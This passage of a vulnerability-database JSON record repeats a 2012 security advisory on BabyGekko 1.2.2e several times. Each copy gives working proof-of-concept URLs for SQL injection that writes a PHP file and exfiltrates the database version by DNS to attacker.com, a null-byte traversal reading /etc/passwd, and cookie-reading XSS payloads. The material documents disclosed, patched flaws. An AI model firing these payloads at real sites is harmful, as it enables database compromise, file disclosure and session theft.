be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server: \n \nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n \n \n2) Local File Inclusion in BabyGekko \n \nThe vulnerability exists due to insufficient validation of input passed via the \"app\" parameter to \"index.php\". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \n \nThe following PoC will show the \"/etc/passwd\" file: \n \nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00 \n \nSecond PoC demonstrates inclusion of \"/tmp/.class.php\" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of \"phpinfo()\" function execution: \n \nhttp://[host]/index.php?app=../../../../../../../tmp/ \n \n \n3) Multiple Cross-Site Scripting (XSS) in BabyGekko \n \n3.1 Input passed via the \"id\" parameter to \"/admin/index.php\" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website. \n \nThe following PoC code demonstrates the vulnerability: \n \nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n3.2 Insufficient sanitation of input passed via the \"username\" and \"password\" HTTP POST parameters to the \"index.php\" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires \"loginbox\" block to be activated. \n \nThe following PoC code demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php\" method=\"post\" enctype=\"multipart/form-data\"> \n<input type=\"hidden\" name=\"username\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"password\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to BabyGekko 1.2.2f or 1.2.4 \n \nMore Information: \nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip \nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko. \n[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs. \n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/118104/babygekko-xsslfisql.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-5699", "CVE-2012-5698", "CVE-2012-5700"], "description": "\r\n\r\nAdvisory ID: HTB23122\r\nProduct: BabyGekko\r\nVendor: babygekko.com\r\nVulnerable Version(s): 1.2.2e and probably prior\r\nTested Version: 1.2.2e\r\nVendor Notification: October 24, 2012 \r\nVendor Patch: November 4, 2012 \r\nPublic Disclosure: November 14, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700\r\nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Multiple SQL Injections in BabyGekko\r\n\r\nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because "/admin/index.php" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. \r\n\r\n1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \r\n\r\nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "&lt;?phpinfo()?&gt;" into it:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.\r\n\r\nThe following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "&lt;?phpinfo()?&gt;" into it:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n\r\n2) Local File Inclusion in BabyGekko\r\n\r\nThe vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \r\n\r\nThe following PoC will show the "/etc/passwd" file:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00\r\n\r\nSecond PoC demonstrates inclusion of "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of "phpinfo()" function execution:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../tmp/\r\n\r\n\r\n3) Multiple Cross-Site Scripting (XSS) in BabyGekko\r\n\r\n3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n3.2 Insufficient sanitation of input passed via the "username" and "password" HTTP POST parameters to the "index.php" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires "loginbox" block to be activated.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">\r\n<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />\r\n<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to BabyGekko 1.2.2f or 1.2.4\r\n\r\nMore Information:\r\nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip\r\nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.\r\n[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2012-11-18T00:00:00", "published": "2012-11-18T00:00:00", "id": "SECURITYVULNS:DOC:28764", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28764", "title": "Multiple vulnerabilities in BabyGekko", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T18:49:27", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2012-11-18T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-5694", "CVE-2012-5696", "CVE-2012-4197", "CVE-2012-5695", "CVE-2012-5475", "CVE-2012-4199", "CVE-2012-5699", "CVE-2012-3414", "CVE-2012-5697", "CVE-2012-5698", "CVE-2012-5700", "CVE-2012-4189", "CVE-2012-5693", "CVE-2012-4198", "CVE-2012-4520"], "modified": "2012-11-18T00:00:00", "id": "SECURITYVULNS:VULN:12719", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12719", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T17:18:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "BabyGekko 1.2.2e Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5698", "CVE-2012-5699", "CVE-2012-5700"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-76538", "id": "SSV:76538", "sourceData": "\n Advisory ID: HTB23122\r\nProduct: BabyGekko\r\nVendor: babygekko.com\r\nVulnerable Version(s): 1.2.2e and probably prior\r\nTested Version: 1.2.2e\r\nVendor Notification: October 24, 2012 \r\nVendor Patch: November 4, 2012 \r\nPublic Disclosure: November 14, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700\r\nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Multiple SQL Injections in BabyGekko\r\n\r\nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because "/admin/index.php" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. \r\n\r\n1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \r\n\r\nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.\r\n\r\nThe following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n\r\n2) Local File Inclusion in BabyGekko\r\n\r\nThe vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \r\n\r\nThe following PoC will show the "/etc/passwd" file:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00\r\n\r\nSecond PoC demonstrates inclusion of "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of "phpinfo()" function execution:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../tmp/\r\n\r\n\r\n3) Multiple Cross-Site Scripting (XSS) in BabyGekko\r\n\r\n3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n3.2 Insufficient sanitation of input passed via the "username" and "password" HTTP POST parameters to the "index.php" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires "loginbox" block to be activated.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">\r\n<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />\r\n<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to BabyGekko 1.2.2f or 1.2.4\r\n\r\nMore Information:\r\nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip\r\nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.\r\n[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-76538", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2022-08-16T06:37:08", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2012-11-15T00:00:00", "type": "exploitdb", "title": "BabyGekko 1.2.2e - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2012-5698", "2012-5699", "2012-5700", "CVE-2012-5698", "CVE-2012-5699", "CVE-2012-5700"], "modified": "2012-11-15T00:00:00", "id": "EDB-ID:22741", "href": "https://www.exploit-db.com/exploits/22741", "sourceData": "Advisory ID: HTB23122\r\nProduct: BabyGekko\r\nVendor: babygekko.com\r\nVulnerable Version(s): 1.2.2e and probably prior\r\nTested Version: 1.2.2e\r\nVendor Notification: October 24, 2012 \r\nVendor Patch: November 4, 2012 \r\nPublic Disclosure: November 14, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700\r\nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Multiple SQL Injections in BabyGekko\r\n\r\nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because \"/admin/index.php\" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. \r\n\r\n1.1 The vulnerability exists due to insufficient validation of input passed via the \"keyword\" parameter to \"/admin/index.php\" (when \"app\" is set to \"users\"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \r\n\r\nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n1.2 The vulnerability exists due to insufficient validation of input passed via the \"query\" parameter to \"/admin/index.php\". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.\r\n\r\nThe following PoC will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n\r\n2) Local File Inclusion in BabyGekko\r\n\r\nThe vulnerability exists due to insufficient validation of input passed via the \"app\" parameter to \"index.php\". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \r\n\r\nThe following PoC will show the \"/etc/passwd\" file:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00\r\n\r\nSecond PoC demonstrates inclusion of \"/tmp/.class.php\" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of \"phpinfo()\" function execution:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../tmp/\r\n\r\n\r\n3) Multiple Cross-Site Scripting (XSS) in BabyGekko\r\n\r\n3.1 Input passed via the \"id\" parameter to \"/admin/index.php\" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n3.2 Insufficient sanitation of input passed via the \"username\" and \"password\" HTTP POST parameters to the \"index.php\" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires \"loginbox\" block to be activated.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" enctype=\"multipart/form-data\">\r\n<input type=\"hidden\" name=\"username\" value='\"><script>alert(document.cookie);</script>' />\r\n<input type=\"hidden\" name=\"password\" value='\"><script>alert(document.cookie);</script>' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to BabyGekko 1.2.2f or 1.2.4\r\n\r\nMore Information:\r\nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip\r\nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.\r\n[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "sourceHref": "https://www.exploit-db.com/download/22741", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:23:22", "description": "BabyGekko before 1.2.4 has SQL injection.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-23T15:15:00", "type": "cve", "title": "CVE-2012-5698", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5698"], "modified": "2020-01-29T20:18:00", "cpe": [], "id": "CVE-2012-5698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5698", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:28", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Baby Gekko before 1.2.2f allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/index.php or the (2) username or (3) password parameter in blocks/loginbox/loginbox.template.php to index.php. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2014-09-22T15:55:00", "type": "cve", "title": "CVE-2012-5700", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 